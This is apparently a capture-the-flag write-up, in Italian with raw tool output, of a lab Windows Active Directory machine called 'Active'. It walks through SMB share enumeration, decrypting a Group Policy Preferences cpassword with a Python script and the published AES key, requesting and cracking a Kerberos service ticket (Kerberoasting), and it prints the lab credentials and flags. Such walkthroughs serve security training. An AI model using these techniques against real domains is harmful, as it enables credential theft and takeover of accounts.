Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-11 18:02 CEST Stats: 0:00:34 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 70.59% done; ETC: 18:03 (0:00:13 remaining) Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 98.46% done; ETC: 18:04 (0:00:00 remaining) Nmap scan report for active (10.129.183.196) Host is up (0.053s latency). Not shown: 983 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-11 16:03:02Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2023-05-11T16:03:57 |_ start_date: 2023-05-11T15:13:58 | smb2-security-mode: | 210: |_ Message signing enabled and required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 72.44 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-11 18:02 CEST Nmap scan report for active (10.129.183.196) Host is up (0.053s latency). Not shown: 65512 closed tcp ports (conn-refused) PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5722/tcp open msdfsr 9389/tcp open adws 47001/tcp open winrm 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49157/tcp open unknown 49158/tcp open unknown 49169/tcp open unknown 49173/tcp open unknown 49174/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 53.94 seconds
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[+] IP: active:445 Name: unknown Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[+] IP: active:445 Name: unknown Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
Anonymous login successful Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 active.htb D 0 Sat Jul 21 12:37:44 2018
Using workgroup WORKGROUP, guest user
smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol smb://active/Replication/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI smb://active/Replication/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf Downloaded 8,11kB in 7 seconds
tree -L 8
.
├── DfsrPrivate
│ ├── ConflictAndDeleted
│ ├── Deleted
│ └── Installing
├── Policies
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── Group Policy
│ │ │ └── GPE.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ ├── Preferences
│ │ │ │ └── Groups
│ │ │ │ └── Groups.xml
│ │ │ └── Registry.pol
│ │ └── USER
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ └── Microsoft
│ │ └── Windows NT
│ │ └── SecEdit
│ │ └── GptTmpl.inf
│ └── USER
└── scripts
21 directories, 7 files
#!/usr/bin/env python3 import base64 from Crypto.Cipher import AES from Crypto.Util.Padding import unpad # This script can be used to decrypt active directory passwords found # in GPP files in SYSVOL shares used to manage GPOs. def decrypt(password): password = password + "=" * ((4 - len(password)) % 4) raw_ciphertext = base64.b64decode(password) key = b"\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b" iv = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" cipher = AES.new(key, AES.MODE_CBC, iv) raw_plaintext = unpad(cipher.decrypt(raw_ciphertext), AES.block_size) plaintext = raw_plaintext.decode() print(plaintext) if __name__ == "__main__": password = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" decrypt(password)
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2023-05-11 17:14:46.640920
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2023-05-11 17:14:46.640920 [-] CCache file is not found. Skipping... $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b803e7e55b385933344c2801e4813a20$1da933dbae61081124175a2313c338434db3027e0b1495b3f74bd65f597050cedc8a054a64c6c1e2be6332dfcbb008a54797a3d90f1ccf5d29edc42671e1135a2adf05197933351c54ab3bce72367c8aadd9b7c78857233e601f0c750096d23b3301863353571642aebcb7b03c462ed076b6e784f5732f58548724d0262e1615a9bd65466e75369afb003dd88adc6db0dfb5a189c73767630bb9b7cee38d60ed45cd64281ead86f05a72541376e1494fc77cb3cae0400d336348dcb79448014953206edc3c9e00c83b59daa37ae56aeb46ae5ca81fdb2df324c96ae68a8c1c2cf50a2aeaa2925647791bd31a33807243ab61fe7c6622ac8b9ce8583624c5b8f4209c01c157d369be70466e7ca11302b6f5114bc4afb184a49df0aa0c41c96f6e3db065333dd2e030f2b1c18d58c259e6c99388703791b299e84a8f4a5426bc2bad6425dc3976ba67210c7d9599334f0c594eeeb095d0d541b69494db84a88ff5cd2adf3413ee8042a0c987dfbc71c2f1b2e18f6ebf7562809f1683d5169563723919f36c7597ca2bef5b441aaa0fa7d52939965d2480032bd54d9f8d9210a735558de69e7afb124a72d1323276dabd50a0c532bc3c92621933cdbb2bcd3c3006598bf1476f61a834b5b6d91938d53cb10714ace3e195887f31cebd4a86704ece579b306947bdbe92c8812574db6d8109bfc592eb063493387722b50096cb68422f61a3a31b09460b0cc569e8c82d35ec9ea51c509a6bee3586ccc279d72311a99f797d07143371db55a835ae9de3a332e68186db8fddff11286b5fa9e639b904f921fe30b4c3c5c10f6121f0709a0f7aed01e68e09cd9455b5accdc4ae26cc2ae472347065ecc8213fb0d50ee6c3836f90e65aad2da8c4810f5b4b5f1ad67b7235ea02ebd62b3127640ed7add59def6203c77c331b441c0c9ba5f0d5d19044d8c5b525da8323dc7463308c084445a54bc573a7c5d1019a19c5a4cab0b17fb1640222f3db2bc17601a21f76d56543a08b63af5f6ba8d68d4c222aa172d1e6808abb6bb9f8ae4bd6c7e190b01d4bb1a1113dbd468341fdd635d042adb1c6f830544717a4364ea26dd7fcf01188860bc6dbfe3bbccf8e05188a5e4071077a310be9c7da596915cee1b5f56458c3cf4c5d34a487e323cbc754890c6398c81d342a7140019654dcf8fabd4147ae8e0f37d8de64fdcc5afa9b539a644f677ea7d0745a767a366a0c889f9b442a5a1982305ce9615fbb6f35a8e38eba8b
Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Ticketmaster1968 (?) 1g 0:00:00:06 DONE (2023-05-11 19:12) 0.1461g/s 1540Kp/s 1540Kc/s 1540KC/s Tiffani143..Thrall Use the "--show" option to display all of the cracked passwords reliably Session completed
SVC_TGS:GPPstillStandingStrong2k18 Administrator:Ticketmaster1968
.
├── DfsrPrivate
│ ├── ConflictAndDeleted
│ ├── Deleted
│ └── Installing
├── Policies
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── Group Policy
│ │ │ └── GPE.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ ├── Preferences
│ │ │ │ └── Groups
│ │ │ │ └── Groups.xml
│ │ │ └── Registry.pol
│ │ └── USER
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ └── Microsoft
│ │ └── Windows NT
│ │ └── SecEdit
│ │ └── GptTmpl.inf
│ └── USER
└── scripts
21 directories, 7 files
<?xml version="1.0" encoding="utf-8"?> <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"> <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"> <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/> </User> </Groups>
Dopo uno scan con nmap abbiamo trovato le seguenti porte
PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5722/tcp open msdfsr 9389/tcp open adws 47001/tcp open winrm 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49157/tcp open unknown 49158/tcp open unknown 49169/tcp open unknown 49173/tcp open unknown 49174/tcp open unknown
Le porte indicano una macchina windows con active-directory. Procedendo con un'enumerazione del servizio SMB (porta 445) abbiamo trovato uno share su cui abbiamo permessi READ-ONLY senza credenziali.
smbmap -H active Replication READ ONLY
A questo punto possiamo accedere allo share tramite varie opzioni:
smbclient per connetterci manualmente e navigare i file remoti
smbclient //MOUNT/Replication -I active -N
smbget per scaricare tutto lo share in modo ricorsivo
smbget -a -R smb://active/Replication
I file scaricati nello share sono i seguenti, e costituiscono un GPO (Group Policy Object).
smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml smb://active/Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol smb://active/Replication/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI smb://active/Replication/active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
Utilizzando la chiave AES-256 messa a disposizione da Windows
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN https://adsecurity.org/?p=2288
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
abbiamo decifrato le credenziali nel file Groups.xml per ottenere
SVC_TGS:GPPstillStandingStrong2k18
Utilizzando le credenziali trovate sono entrato in SMB nella share Users e nel desktop di SVC_TGS ho trovato la flag dell'utente
smbclient //MOUNT/Users -I active -U=SVC_TGS%GPPstillStandingStrong2k18
Dopo aver preso le credenziali di SVC_TGS andiamo ad effettuare
enumerazione degli SPNs tramite lo script GetUserSPNs.py
GetUserSPNs.py -dc-ip 10.129.183.196 active.htb/SVC_TGS:GPPstillStandingStrong2k18
Troviamo il serivzio active/CIFS:445 associato all'account
administrator, prendiamo un TGS con la flag -request
GetUserSPNs.py -dc-ip 10.129.183.196 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
il ticket preso è il seguente
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b803e7e55b385933344c2801e4813a20$1da933dbae61081124175a2313c338434db3027e0b1495b3f74bd65f597050cedc8a054a64c6c1e2be6332dfcbb008a54797a3d90f1ccf5d29edc42671e1135a2adf05197933351c54ab3bce72367c8aadd9b7c78857233e601f0c750096d23b3301863353571642aebcb7b03c462ed076b6e784f5732f58548724d0262e1615a9bd65466e75369afb003dd88adc6db0dfb5a189c73767630bb9b7cee38d60ed45cd64281ead86f05a72541376e1494fc77cb3cae0400d336348dcb79448014953206edc3c9e00c83b59daa37ae56aeb46ae5ca81fdb2df324c96ae68a8c1c2cf50a2aeaa2925647791bd31a33807243ab61fe7c6622ac8b9ce8583624c5b8f4209c01c157d369be70466e7ca11302b6f5114bc4afb184a49df0aa0c41c96f6e3db065333dd2e030f2b1c18d58c259e6c99388703791b299e84a8f4a5426bc2bad6425dc3976ba67210c7d9599334f0c594eeeb095d0d541b69494db84a88ff5cd2adf3413ee8042a0c987dfbc71c2f1b2e18f6ebf7562809f1683d5169563723919f36c7597ca2bef5b441aaa0fa7d52939965d2480032bd54d9f8d9210a735558de69e7afb124a72d1323276dabd50a0c532bc3c92621933cdbb2bcd3c3006598bf1476f61a834b5b6d91938d53cb10714ace3e195887f31cebd4a86704ece579b306947bdbe92c8812574db6d8109bfc592eb063493387722b50096cb68422f61a3a31b09460b0cc569e8c82d35ec9ea51c509a6bee3586ccc279d72311a99f797d07143371db55a835ae9de3a332e68186db8fddff11286b5fa9e639b904f921fe30b4c3c5c10f6121f0709a0f7aed01e68e09cd9455b5accdc4ae26cc2ae472347065ecc8213fb0d50ee6c3836f90e65aad2da8c4810f5b4b5f1ad67b7235ea02ebd62b3127640ed7add59def6203c77c331b441c0c9ba5f0d5d19044d8c5b525da8323dc7463308c084445a54bc573a7c5d1019a19c5a4cab0b17fb1640222f3db2bc17601a21f76d56543a08b63af5f6ba8d68d4c222aa172d1e6808abb6bb9f8ae4bd6c7e190b01d4bb1a1113dbd468341fdd635d042adb1c6f830544717a4364ea26dd7fcf01188860bc6dbfe3bbccf8e05188a5e4071077a310be9c7da596915cee1b5f56458c3cf4c5d34a487e323cbc754890c6398c81d342a7140019654dcf8fabd4147ae8e0f37d8de64fdcc5afa9b539a644f677ea7d0745a767a366a0c889f9b442a5a1982305ce9615fbb6f35a8e38eba8b
questo ticket può essere craccato con john nel seguente modo
john --format=krb5tgs --wordlist=~/repos/projects/wordlists/passwords/rockyou.txt CIFS_ticket.txt
e alla fine otteniamo la password
Administrator:Ticketmaster1968
e con questa password possiamo loggare in SMB e trovare nella path
Users\Administrator\Desktop\root.txt la root flag per finire la
macchina.
user: 6c4ed2500bd7ed8605de1fc2a7d80eca
root: 3be06f2e50f63b23b2640ec6f49ec885